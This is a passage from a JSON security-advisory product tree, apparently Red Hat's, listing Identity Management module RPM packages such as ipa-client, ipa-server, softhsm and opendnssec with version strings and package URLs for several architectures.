"product_id": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch (idm:DL1)",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"product": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch (idm:DL1)",
"product_id": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-dns@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaserver@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipatests@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch (idm:DL1)",
"product_id": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch (idm:DL1)",
"product_id": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 (idm:client)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 (idm:DL1)",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 (idm:DL1)",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1)",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client)",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le (idm:client)",
